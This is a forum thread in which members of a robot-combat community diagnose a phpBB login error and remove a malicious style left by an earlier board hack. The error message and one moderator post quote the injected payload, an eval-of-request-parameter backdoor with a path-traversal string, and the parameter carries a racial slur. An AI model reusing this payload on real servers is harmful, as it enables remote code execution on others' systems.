Forum Error

Please post all questions and answers in here. This way people can easily see if someone else has the same problem.

Moderators: BeligerAnt, petec, administrator

Rhys (Duff)

Forum Error

Post by Rhys (Duff) »

I seem to be having a bit of a problem with the forum. Everytime I log into my old account, It comes up with this error message

"phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 361
File : functions.php"

This new account seems to be working fine, and isn't going to cause any problems, but I was just wondering if anyone else had this problem, or if the knew how to fix it?
My Robots:

Duff, TNT, Randar, The Fear (Flea), The Nightmare of Milky Joe (SuperAnt/Walker)
Simon Windisch

Post by Simon Windisch »

According to http://www.phpbb.com/phpBB/viewtopic.ph ... fc#1479909 it may be an attack on the board, it also describes how to fix it.

Over to Gary or Pete...

Simon
Craig_Anto3

Post by Craig_Anto3 »

stripslashes($_REQUEST[nigga]) should be a bit of a give away that its a virus of some sort
BeligerAnt

Post by BeligerAnt »

Guys

The phpBB server is offline at the moment so I can't follow Simon's very helpful link :(

However, I had a look around and it does look like the board had been hacked in some way. There appeared to be a new style on the board named "FI Black" with a description something like "aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp"

Duff's account for some reason had this style selected instead of the default one (subSilver). I have set the Duff account back to SubSilver and deleted FI Black. Hopefully this will fix it.

If anyone else has a problem and can read this as a Guest but not log in, then drop me an email and I'll try to sort it out.
Gary, Team BeligerAnt
Simon Windisch

Post by Simon Windisch »

Gary, fom memory, it said to remove the extra style.

Simon
petec

Post by petec »

The FI black was left after the big hack attack a year or so ago. When I looked through it, it was quite difficult to work out which was hack and which was original PHPBB so I left it there and set everyone to default. I don't know why someones default had changed, but it happens.

Many thanks to Gary for sorting this out. I was out of the country for a week and had no internet access so I didn't know anything about it.
------------
RobotWars101.org
RobotWars101.co.uk
Antweights.com
Antweights.co.uk
AntweightWorldSeries.com
peterwaller

Post by peterwaller »

Does anyone know what has happened to the FRA forum it doesn't seem to be there any more.
ewan

Post by ewan »

The FRA Forum can be found at http://www.fightingrobots.co.uk/forum.htm after their move of server - or to view without the side menu try http://www.fightingrobots.co.uk/cgi-bin ... ?pg=topics

All the best
peterwaller

Post by peterwaller »

Thanks Ewan